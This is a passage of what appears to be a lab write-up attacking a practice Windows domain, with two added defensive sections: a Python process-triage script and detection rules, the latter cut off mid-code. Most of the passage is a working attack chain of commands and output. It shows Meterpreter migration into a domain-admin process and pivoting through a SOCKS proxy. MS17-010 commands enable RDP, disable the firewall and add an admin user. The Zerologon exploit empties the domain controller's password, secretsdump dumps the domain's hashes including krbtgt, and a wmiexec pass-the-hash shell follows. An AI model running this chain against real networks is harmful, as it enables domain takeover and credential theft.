  • The membership of the "Domain Admins" group, which is important for understanding the high-privilege accounts in the domain environment.
  • The domain name is god.org, a domain used inside an organization for authentication and resource management.

Guess verified.

MSF process injection (migrating to GOD\Administrator)

Prerequisite for MSF process injection: a payload must have been generated and executed so that the attacker machine has a connected session; here the payload generated earlier is already connected, so this step is skipped.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System             x64   0
 156   3012  phpStudy.exe       x86   1        GOD\Administrator             C:\phpStudy\phpStudy.exe
 252   4     smss.exe           x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 332   488   svchost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 336   328   csrss.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 388   328   wininit.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 396   380   csrss.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 412   488   SearchIndexer.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchIndexer.exe
 432   380   winlogon.exe       x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 488   388   services.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 504   388   lsass.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 512   388   lsm.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 628   488   svchost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 688   488   vmacthlp.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 720   488   svchost.exe        x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 776   488   svchost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 816   396   conhost.exe        x64   1        GOD\Administrator             C:\Windows\system32\conhost.exe
 916   488   svchost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 956   488   svchost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 972   2820  cmd.exe            x86   1        GOD\Administrator             C:\Windows\SysWOW64\cmd.exe
 1076  488   svchost.exe        x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 1208  488   spoolsv.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1252  488   svchost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 1272  488   msdtc.exe          x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 1300  396   conhost.exe        x64   1        GOD\Administrator             C:\Windows\system32\conhost.exe
 1328  4764  Everything.exe     x64   2        STU1\hack01                   C:\Program Files\Everything\Everything.exe
 1372  3440  64.exe             x64   1        GOD\Administrator             C:\64.exe
 1400  396   conhost.exe        x64   1        GOD\Administrator             C:\Windows\system32\conhost.exe
 1408  488   openvpnserv.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\OpenVPN\bin\openvpnserv.exe
 1500  488   VGAuthService.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGA
                                                                             uthService.exe
 1532  488   vmtoolsd.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1684  488   svchost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 1696  2156  conhost.exe        x64   2        STU1\hack01                   C:\Windows\system32\conhost.exe
 1700  4764  openvpn-gui.exe    x64   2        STU1\hack01                   C:\Program Files\OpenVPN\bin\openvpn-gui.exe
 1712  4008  firefox.exe        x86   1        GOD\Administrator             C:\Program Files (x86)\Mozilla Firefox\firefox.exe
 1776  628   WmiPrvSE.exe       x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\wbem\wmiprvse.exe
 1784  488   svchost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 1840  4160  winlogon.exe       x64   3        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 1892  4592  cmd.exe            x86   1        GOD\Administrator             C:\Windows\SysWOW64\cmd.exe
 2004  4104  64.exe             x64   1        GOD\Administrator             C:\64.exe
 2052  156   httpd.exe          x86   1        GOD\Administrator             C:\phpStudy\Apache\bin\httpd.exe
 2088  3012  vmtoolsd.exe       x64   1        GOD\Administrator             C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2096  3012  Everything.exe     x64   1        GOD\Administrator             C:\Program Files\Everything\Everything.exe
 2136  3012  openvpn-gui.exe    x64   1        GOD\Administrator             C:\Program Files\OpenVPN\bin\openvpn-gui.exe
 2156  1648  csrss.exe          x64   2        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 2416  488   svchost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2732  156   mysqld.exe         x86   1        GOD\Administrator             C:\phpStudy\MySQL\bin\mysqld.exe
 2760  488   sppsvc.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\sppsvc.exe
 2796  488   taskhost.exe       x64   1        GOD\Administrator             C:\Windows\system32\taskhost.exe
 2820  2052  httpd.exe          x86   1        GOD\Administrator             C:\phpStudy\Apache\bin\httpd.exe
 2952  396   conhost.exe        x64   1        GOD\Administrator             C:\Windows\system32\conhost.exe
 2988  916   dwm.exe            x64   1        GOD\Administrator             C:\Windows\system32\Dwm.exe
 3012  2980  explorer.exe       x64   1        GOD\Administrator             C:\Windows\Explorer.EXE
 3244  1840  LogonUI.exe        x64   3        NT AUTHORITY\SYSTEM           C:\Windows\system32\LogonUI.exe
 3304  396   conhost.exe        x64   1        GOD\Administrator             C:\Windows\system32\conhost.exe
 3364  4008  firefox.exe        x86   1        GOD\Administrator             C:\Program Files (x86)\Mozilla Firefox\firefox.exe
 3396  4008  firefox.exe        x86   1        GOD\Administrator             C:\Program Files (x86)\Mozilla Firefox\firefox.exe
 3440  972   cmd.exe            x86   1        GOD\Administrator             C:\Windows\SysWOW64\cmd.exe
 3620  628   slui.exe           x64   2        STU1\hack01                   C:\Windows\System32\slui.exe
 3672  1648  winlogon.exe       x64   2        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 3776  488   svchost.exe        x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 3796  488   svchost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3912  4008  firefox.exe        x86   1        GOD\Administrator             C:\Program Files (x86)\Mozilla Firefox\firefox.exe
 4008  4000  firefox.exe        x86   1        GOD\Administrator             C:\Program Files (x86)\Mozilla Firefox\firefox.exe
 4104  4296  cmd.exe            x86   1        GOD\Administrator             C:\Windows\SysWOW64\cmd.exe
 4136  4160  csrss.exe          x64   3        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 4296  2820  cmd.exe            x86   1        GOD\Administrator             C:\Windows\SysWOW64\cmd.exe
 4304  488   taskhost.exe       x64   2        STU1\hack01                   C:\Windows\system32\taskhost.exe
 4368  5048  cmd.exe            x86   1        GOD\Administrator             C:\Windows\SysWOW64\cmd.exe
 4376  1892  64.exe             x64   1        GOD\Administrator             C:\64.exe
 4384  1076  rdpclip.exe        x64   2        STU1\hack01                   C:\Windows\system32\rdpclip.exe
 4592  2820  cmd.exe            x86   1        GOD\Administrator             C:\Windows\SysWOW64\cmd.exe
 4712  916   dwm.exe            x64   2        STU1\hack01                   C:\Windows\system32\Dwm.exe
 4756  1328  Everything.exe     x64   2        STU1\hack01                   C:\Program Files\Everything\Everything.exe
 4760  3796  WerFault.exe       x64   1        GOD\Administrator             C:\Windows\system32\WerFault.exe
 4764  4704  explorer.exe       x64   2        STU1\hack01                   C:\Windows\Explorer.EXE
 4800  4368  64.exe             x64   1        GOD\Administrator             C:\64.exe
 4876  396   conhost.exe        x64   1        GOD\Administrator             C:\Windows\system32\conhost.exe
 4976  4764  vmtoolsd.exe       x64   2        STU1\hack01                   C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 5048  2820  cmd.exe            x86   1        GOD\Administrator             C:\Windows\SysWOW64\cmd.exe
 5080  4764  cmd.exe            x64   2        STU1\hack01                   C:\Windows\system32\cmd.exe

meterpreter > migrate 2820
[*] Migrating from 1372 to 2820...
[*] Migration completed successfully.
meterpreter > getuid
Server username: GOD\Administrator
meterpreter > 
                     

We are still in the NT AUTHORITY\SYSTEM context; ps lists every process together with the account it runs under.
migrate PID moves the session into another process; the PID is the id of the process you choose. Here I picked the httpd process (PID 2820), which puts us in the GOD\Administrator context.

(screenshot)

Migration succeeded; getuid now reports GOD\Administrator.

(screenshot)

Verify the GOD\Administrator account's privileges from a shell.

(screenshot)

Here we can see that GOD\Administrator is able to read information from the other two machines, which further confirms our guess.
GOD\Administrator has domain-admin rights, and rdesktop shows that account already logged in.

(screenshot)
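Read as a defender, the ps listing above already contains the findings that made this step possible: httpd.exe runs as GOD\Administrator (so any webshell inherits a domain admin), that account has an interactive logon on the web host (so anyone who reaches SYSTEM can migrate into it), and an executable is running from C:\64.exe. The following script is an added example, not code from the original post or from Metasploit; it parses rows in the Meterpreter ps layout shown above (a few of those rows are embedded as sample input) and reports those three conditions. The privileged-account set, trusted directories and web-stack binaries are assumptions for this host.

```python
r"""Triage a Meterpreter `ps` listing the way a defender reviewing this host
would: which executables run from unexpected paths, which service runs as a
privileged account, and whether a privileged account has an interactive
logon on the box (the situation the migrate step above takes advantage of).

Added example; not code from the original post or from Metasploit.
The column layout (PID PPID Name Arch Session User Path) is the one in the
listing above; the sample rows are a handful of lines copied from it."""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid name arch session user path")

# User and Path are the only columns that can contain a single space
# ("NT AUTHORITY\SYSTEM", "C:\Program Files\..."); they are separated by
# two or more spaces, which the lazy (.+?)\s{2,} relies on.
_ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\S+)\s+(\S+)\s+(\d+)\s+(.+?)\s{2,}(\S.*?)\s*$")

# Sample rows copied from the listing above.
SAMPLE_PS = [
    r" 816   396   conhost.exe        x64   1        GOD\Administrator             C:\Windows\system32\conhost.exe",
    r" 1372  3440  64.exe             x64   1        GOD\Administrator             C:\64.exe",
    r" 1408  488   openvpnserv.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\OpenVPN\bin\openvpnserv.exe",
    r" 2052  156   httpd.exe          x86   1        GOD\Administrator             C:\phpStudy\Apache\bin\httpd.exe",
    r" 2820  2052  httpd.exe          x86   1        GOD\Administrator             C:\phpStudy\Apache\bin\httpd.exe",
    r" 5080  4764  cmd.exe            x64   2        STU1\hack01                   C:\Windows\system32\cmd.exe",
]

# Assumptions for this example: which accounts count as privileged on this
# host, where executables are expected to live, and which binaries are the
# web stack. Adjust for the host being reviewed.
PRIVILEGED_ACCOUNTS = {"GOD\\Administrator"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\", "c:\\phpstudy\\")
WEB_SERVICE_BINARIES = {"httpd.exe", "mysqld.exe"}


def parse_ps(lines):
    """Parse rows of a Meterpreter ps listing; header and separator lines are skipped."""
    procs = []
    for line in lines:
        m = _ROW.match(line)
        if m:
            pid, ppid, name, arch, session, user, path = m.groups()
            procs.append(Proc(int(pid), int(ppid), name, arch, int(session), user, path))
    return procs


def triage(procs):
    r"""Return (pid, name, finding) tuples. Findings:
    unusual_path                 - image outside TRUSTED_DIRS (e.g. C:\64.exe)
    web_service_as_privileged    - httpd/mysqld running as a privileged account,
                                   so any webshell inherits that account
    privileged_interactive_logon - reported once per (account, session): a
                                   logged-on privileged account on a web host is
                                   what migrating from SYSTEM hands an attacker"""
    findings = []
    seen_logons = set()
    for p in procs:
        if not p.path.lower().startswith(TRUSTED_DIRS):
            findings.append((p.pid, p.name, "unusual_path"))
        if p.name.lower() in WEB_SERVICE_BINARIES and p.user in PRIVILEGED_ACCOUNTS:
            findings.append((p.pid, p.name, "web_service_as_privileged"))
        if p.user in PRIVILEGED_ACCOUNTS and p.session != 0 and (p.user, p.session) not in seen_logons:
            seen_logons.add((p.user, p.session))
            findings.append((p.pid, p.name, "privileged_interactive_logon"))
    return findings


if __name__ == "__main__":
    for pid, name, finding in triage(parse_ps(SAMPLE_PS)):
        print(f"{pid:>5}  {name:<16} {finding}")
```

The fix for each finding is the obvious one: run the web stack under a dedicated low-privilege service account, keep domain admins off member servers (no interactive or RDP logons with that account), and alert on executables launched from the root of the system drive.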

Snapshot ------------------------------------------------------------

Snapshot Win7 and Kali; you can also snapshot all of the machines.

✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌

Getting sessions on the inner hosts

msf (add route + set up proxy)

A route must be added before the proxy is set up; use the msf module post/multi/manage/autoroute.

meterpreter > run autoroute -s 192.168.52.0/24 

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.52.0/255.255.255.0...
[-] Could not execute autoroute: ArgumentError Invalid :session, expected Session object got Msf::Sessions::Meterpreter_x64_Win
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.52.0       255.255.255.0      Session 4

meterpreter > bg
[*] Backgrounding session 4...
msf6 exploit(multi/handler) > 

Add a proxy with the msf module auxiliary/server/socks_proxy and start it with run.

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options 

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  1080             yes       The port to listen on
   VERSION  5                yes       The SOCKS version to use (Accepted: 4a, 5)


   When VERSION is 5:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   USERNAME                   no        Proxy username for SOCKS5 listener


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server



View the full module info with the info, or info -d command.

msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) > 
[*] Starting the SOCKS proxy server

msf6 auxiliary(server/socks_proxy) > 

jobs shows the proxy running as a background job; edit /etc/proxychains4.conf to match the configuration above.

msf6 auxiliary(server/socks_proxy) > jobs

Jobs
====

  Id  Name                           Payload  Payload opts
  --  ----                           -------  ------------
  0   Auxiliary: server/socks_proxy

msf6 auxiliary(server/socks_proxy) >  vi /etc/proxychains4.conf
[*] exec:  vi /etc/proxychains4.conf

proxychains nmap scan

proxychains nmap 192.168.52.138 -sT does a full scan but is slow, so here only the common ports are scanned.

proxychains nmap -sV -Pn -p 22,80,135,443,445,3389 192.168.52.141
proxychains nmap -sV -Pn -p 22,80,135,443,445,3389 192.168.52.138

(screenshot)
You can also open another terminal and run the proxychains nmap scan there.
(screenshot)

Domain member: ms17-010
msf EternalBlue
msf6 auxiliary(server/socks_proxy) > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 exploit(multi/handler) > use 2
msf6 auxiliary(admin/smb/ms17_010_command) > options
msf6 auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.52.141
msf6 auxiliary(admin/smb/ms17_010_command) > set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
msf6 auxiliary(admin/smb/ms17_010_command) > run
msf6 auxiliary(admin/smb/ms17_010_command) > set command netsh advfirewall set allprofiles state off
msf6 auxiliary(admin/smb/ms17_010_command) > run

(screenshot)

Log in with rdesktop
┌──(root㉿kali)-[~]
└─# rdesktop 192.168.52.141

(screenshot)
(screenshot)
(screenshot)

Win7 Remote Desktop

Alternatively, use the ms17-010 command module to create an account hack02 and then connect with Remote Desktop from inside Win7.

set command net user hack02 hack@test2003 /add
set command net localgroup administrators hack02 /add

(screenshot)
(screenshot)

Domain controller: CVE-2020-1472
Resetting the DC's password to empty

The Zerologon vulnerability lets an attacker reset the domain controller's machine-account password to an empty string, potentially taking control of the domain controller.
zerologon download: https://codeload.github.com/risksense/zerologon/zip/refs/heads/master

┌──(root㉿kali)-[~]
└─# cd  Desktop 
                                                                                                                                                                       
┌──(root㉿kali)-[~/Desktop]
└─# unzip zerologon-master.zip 
Archive:  zerologon-master.zip
   creating: zerologon-master/
  inflating: zerologon-master/LICENSE  
  inflating: zerologon-master/README.md  
  inflating: zerologon-master/reinstall_original_pw.py  
  inflating: zerologon-master/requirements.txt  
  inflating: zerologon-master/set_empty_pw.py  
  inflating: frp_0.44.0_linux_amd64.tar.gz  
                                                                                                                                                                       
┌──(root㉿kali)-[~/Desktop]
└─# cd zerologon-master 
                                                                                                                                                                       
┌──(root㉿kali)-[~/Desktop/zerologon-master]
└─# ls
LICENSE  README.md  reinstall_original_pw.py  requirements.txt  set_empty_pw.py
                                                                                                                                                                       
┌──(root㉿kali)-[~/Desktop/zerologon-master]
└─#  python3 set_empty_pw.py owa 192.168.52.138
Performing authentication attempts...
===========================================
NetrServerAuthenticate3Response 
ServerCredential:               
    Data:                            b'z\xb8\xea,\xaf1\xd2U' 
NegotiateFlags:                  556793855 
AccountRid:                      1001 
ErrorCode:                       0 


server challenge b'z\x19\x8f_\x00\x07\x1b\x07'
NetrServerPasswordSet2Response 
ReturnAuthenticator:            
    Credential:                     
        Data:                            b'\x01i\xb7Y\xff\x97Lm' 
    Timestamp:                       0 
ErrorCode:                       0 



Success! DC should now have the empty string as its machine password.
        

This tries to set the machine-account password of the target domain controller (IP 192.168.52.138) to empty; the target here is the DC's IP, and the result is Success!
The DC's password has been reset to empty.

(screenshot)

┌──(root㉿kali)-[~/Desktop/zerologon-master]
└─# impacket-secretsdump -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'god.org/owa$@192.168.52.138'                                                                      
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x980de85005a72e9a8d7c401ee3d2363b
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2e8b24e00bd703e52cfe327a072006b0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
GOD\OWA$:aes256-cts-hmac-sha1-96:1761a1694ad74bbf1065b690c1a7d48f8020a07ac4163ad3fcdce1175d9d638f
GOD\OWA$:aes128-cts-hmac-sha1-96:7fd222a440e9a2359f41d472740c63bc
GOD\OWA$:des-cbc-md5:94795be0d0e516fe
GOD\OWA$:plain_password_hex:060e115dd4087c00981fa99cd9aefe65f1ffabe5bf20bd38873f30a0dc9def82ebe3af6764aba8746923405e2a0260b4c69f9271f7fe2ce0ebf46c69eabdca13c4900796526d580a6e6cbccef754e4a2a597141475c80570dbd96dea530bc9c027cfce4ed94f37202a427c2f632342eaa561432487fa909c5995696b941dc3acbbcadca9f282e40b4b0577e8ca472cccea0042e53f2f0a510372f950cf295fcd7d38de07e77c918f42e7d93fb7bfb0240f91694632554948a79c865717290d7fc4c8f17bf64f10844fcc2e5d0530d0d8ba304031a473f66baed901c30558f7ff78900f95958521d5dfedc34d5afd210b
GOD\OWA$:aad3b435b51404eeaad3b435b51404ee:19e4410dee5e1007bd435430491222b9:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x99a225f950e4b443c3104fd8decefa12f0ad7f53
dpapi_userkey:0x93c6670d6c538e0c31ed6a8bcf74550f46961386
[*] NL$KM 
 0000   25 43 63 20 92 1D 93 C5  E7 9E 92 E4 78 7D 3F D0   %Cc ........x}?.
 0010   44 7F 4E C2 C3 43 DF E2  6E 44 FD FF 36 D6 5F 4D   D.N..C..nD..6._M
 0020   9C E9 83 07 84 42 BF A7  91 59 4E 51 FE 4E 76 89   .....B...YNQ.Nv.
 0030   E1 99 3C 62 E4 CC 74 71  42 F8 86 02 BD A6 E8 87   ..<b..tqB.......
NL$KM:25436320921d93c5e79e92e4787d3fd0447f4ec2c343dfe26e44fdff36d65f4d9ce983078442bfa791594e51fe4e7689e1993c62e4cc747142f88602bda6e887
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:db4371323f83b0ad7f16ea72eb1fcd73:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:58e91a5ac358d86513ab224312314061:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:4a549006cbb3489f8ed040e2771a5a14:::
god.org\ligang:1106:aad3b435b51404eeaad3b435b51404ee:1e3d22f88dfd250c9312d21686c60f41:::
OWA$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ROOT-TVI862UBEH$:1104:aad3b435b51404eeaad3b435b51404ee:d67367ecf4bb9c01d2043539d11c75dd:::
STU1$:1105:aad3b435b51404eeaad3b435b51404ee:889a6931bb99725d146c68fa1b90dd44:::
DEV1$:1107:aad3b435b51404eeaad3b435b51404ee:bed18e5b9d13bb384a3041a10d43c01b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9fb9ae5428f46b8ef7f4d5ebbb113aaa2809e311530ae71a7858c89610328f79
Administrator:aes128-cts-hmac-sha1-96:cdfc9aa494972729d7ee328bfdecc30c
Administrator:des-cbc-md5:76ad1592498ace10
Administrator:rc4_hmac:db4371323f83b0ad7f16ea72eb1fcd73
krbtgt:aes256-cts-hmac-sha1-96:a780c2c18b3287e3448562a36dccb2d57d11fd398b55ce2cd9b128308cef74df
krbtgt:aes128-cts-hmac-sha1-96:2e35721544960f553afcba54252d7b13
krbtgt:des-cbc-md5:8cc1019b7ccd1319
krbtgt:rc4_hmac:58e91a5ac358d86513ab224312314061
liukaifeng01:aes256-cts-hmac-sha1-96:bef65a270d26f26117069b5dd6a381709ee0c61ec0ef1a9e233c2a47540361f6
liukaifeng01:aes128-cts-hmac-sha1-96:13e2af34958886c3d8a173ce7363f53d
liukaifeng01:des-cbc-md5:7f4aefadfef22325
liukaifeng01:rc4_hmac:4a549006cbb3489f8ed040e2771a5a14
god.org\ligang:aes256-cts-hmac-sha1-96:6c64f4839c02b73f7604fb86dfc3f015acbf3b9c82cc8c302b463ae1e6962d82
god.org\ligang:aes128-cts-hmac-sha1-96:587d041a1163870abc419487cea00e04
god.org\ligang:des-cbc-md5:57760e974551d592
god.org\ligang:rc4_hmac:1e3d22f88dfd250c9312d21686c60f41
OWA$:aes256-cts-hmac-sha1-96:ef4ee190931baf3a4d52637f865e1038dabc4dae790917e82644d259b49bfa8b
OWA$:aes128-cts-hmac-sha1-96:05eaf94d27ad24e849b83568e60e8ab3
OWA$:des-cbc-md5:ad0eaef73120f4ab
OWA$:rc4_hmac:31d6cfe0d16ae931b73c59d7e0c089c0
ROOT-TVI862UBEH$:aes256-cts-hmac-sha1-96:202aee0a4adcdf969cf370d11e5ebf598e2d3601b747c1ed8097bfd7a23c2aa7
ROOT-TVI862UBEH$:aes128-cts-hmac-sha1-96:3cbaa0f7a146cd39cb1e6cc6690a6c71
ROOT-TVI862UBEH$:des-cbc-md5:6e52109d15ef7062
ROOT-TVI862UBEH$:rc4_hmac:d67367ecf4bb9c01d2043539d11c75dd
STU1$:aes256-cts-hmac-sha1-96:485c5313137469ea70e426526fc944d90708b5ff3fedcb7006d4c967d3d70fb4
STU1$:aes128-cts-hmac-sha1-96:f26fd290ac58a8d8665c6935f5cb7a92
STU1$:des-cbc-md5:cdd019cefd76f2a8
STU1$:rc4_hmac:889a6931bb99725d146c68fa1b90dd44
DEV1$:aes256-cts-hmac-sha1-96:4e724c5cfb62bcab5e6baa5a5a36d638568dd5d91ee4a311c1feb4f5e40849ce
DEV1$:aes128-cts-hmac-sha1-96:9c68d7e02dac2dc0fa0f7aebfdbd1afb
DEV1$:des-cbc-md5:f8efa87a02802532
DEV1$:rc4_hmac:bed18e5b9d13bb384a3041a10d43c01b
[*] Cleaning up... 
                         

The password is now the empty string, whose NT hash is 31d6cfe0d16ae931b73c59d7e0c089c0.

(screenshot)

Getting a shell with wmiexec.py

wmiexec.py: a semi-interactive shell that works over Windows Management Instrumentation; it needs no service or agent installed on the target, runs as administrator, and is very stealthy.

┌──(root㉿kali)-[~/Desktop/zerologon-master]
└─# git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 23605, done.
remote: Counting objects: 100% (181/181), done.
remote: Compressing objects: 100% (130/130), done.
remote: Total 23605 (delta 97), reused 102 (delta 51), pack-reused 23424
Receiving objects: 100% (23605/23605), 10.24 MiB | 2.00 MiB/s, done.
Resolving deltas: 100% (17887/17887), done.
                                                                                                                                                                                  
┌──(root㉿kali)-[~/Desktop/zerologon-master]
└─# cd impacket        
                                                                                                                                                                                                                                                                                                                                                                             
┌──(root㉿kali)-[~/Desktop/zerologon-master/impacket]
└─# python setup.py install
                                                                                                                                                                                                          
┌──(root㉿kali)-[~/Desktop/zerologon-master/impacket]
└─# cd examples                                                                                                                      
                                                                                                                                                                                                          
┌──(root㉿kali)-[~/Desktop/zerologon-master/impacket/examples]
└─# python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:db4371323f83b0ad7f16ea72eb1fcd73 god.org/administrator@192.168.52.138
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
god\administrator

C:\>net user /domain
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec

\\ ���û��ʻ�

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt                   
ligang                   liukaifeng01             
����������ϣ�������һ����������


C:\>hostname
owa

(screenshot)
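Every step in the last two sections leaves a record on the target if auditing is on: the ms17_010_command calls change fDenyTSConnections to 0, turn the firewall profiles off and create a local user that is then added to Administrators, and wmiexec.py, for all its lack of an agent, runs each command as cmd.exe /Q /c ... 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1 under WmiPrvSE.exe and reads the output file back over SMB. The script below is an added example, not code from the original post, Metasploit or impacket. It runs a handful of detection rules over constructed, simplified event records; event IDs and field names follow the Windows Security log and Sysmon where I know them (4657, 4950, 4720, 4732, Sysmon event 1), but the values, hostnames and timestamps are made up for the example.

```python
"""Detection rules for what the last two sections leave behind on the
targets: the ms17_010_command changes (fDenyTSConnections set to 0, firewall
profiles switched off, a local user created and added to Administrators) and
the process pattern of a wmiexec.py shell.

Added example; not code from the original post, Metasploit or impacket.
The events below are constructed and simplified. Event IDs and field names
follow the Windows Security log and Sysmon where I know them (4657 registry
value modified, 4950 firewall setting changed, 4720 user created, 4732 member
added to a local group, Sysmon 1 process creation); values and timestamps
are made up. Two caveats a defender needs: 4657 is only generated when the
key carries a SACL and registry auditing is on, and wmiexec's cmd.exe child
is only visible if process-creation logging with command lines is enabled."""

ADMIN_WINDOW = 600  # seconds between a 4720 and the 4732 into Administrators (assumption)

SAMPLE_EVENTS = [
    {"t": 100, "EventID": 4657, "SubjectUserName": "ROOT-TVI862UBEH$",
     "ObjectName": "\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server",
     "ObjectValueName": "fDenyTSConnections", "OldValue": "1", "NewValue": "0"},
    {"t": 130, "EventID": 4950, "ProfileChanged": "Domain", "SettingType": "Enable Windows Firewall", "SettingValue": "No"},
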